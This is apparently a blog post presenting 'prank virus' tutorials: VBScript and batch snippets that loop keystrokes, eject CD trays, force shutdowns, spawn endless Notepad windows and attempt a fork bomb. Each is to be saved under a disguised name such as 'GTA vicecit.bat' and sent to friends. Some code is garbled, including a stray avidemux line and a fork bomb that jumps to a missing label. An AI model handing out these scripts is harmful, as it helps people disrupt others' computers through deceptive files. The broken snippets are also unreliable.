virus info





Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial, Tips N Track is not responsible for your loss.
Here on www.nyange1.blogspot.com , I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.
To use the codes I am going to provide, all you need to do is to copy the codes from Tips N Track, paste it in any notepad or text file, than save the text file with anyname.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
You Can Stop virus Follow This Steps(Only .VBS Form)
go to task manager -> click on process -> then find wscript.exe -> end this process.

1) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

2) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

3) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
Code:

MsgBox "Your PC is Hack"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

4) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "me.VBS" and send it.

5) Code to shutdown computer

Open NotePad And Write This:
Code:

avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00

                                                                    OR

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "GTA vicecit.bat" and send it.

6) Open Notepad continually in your friend's computer:
Type :
Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Nyange.BAT" and send it.

7) code for make a Fork Bomb(LoL)
Open NotePad And Write This:
Code:

start
%0
goto :S
Share on Google Plus

About Unknown

NyangeTech inahamasisha maelfu na maelfu ya watu kujitambua kuelekea safari ya kuangaziwa ili kupata utulivu wa nafsi kwa kupata muunganiko na Mungu.
    Blogger Comment

0 comments:

Post a Comment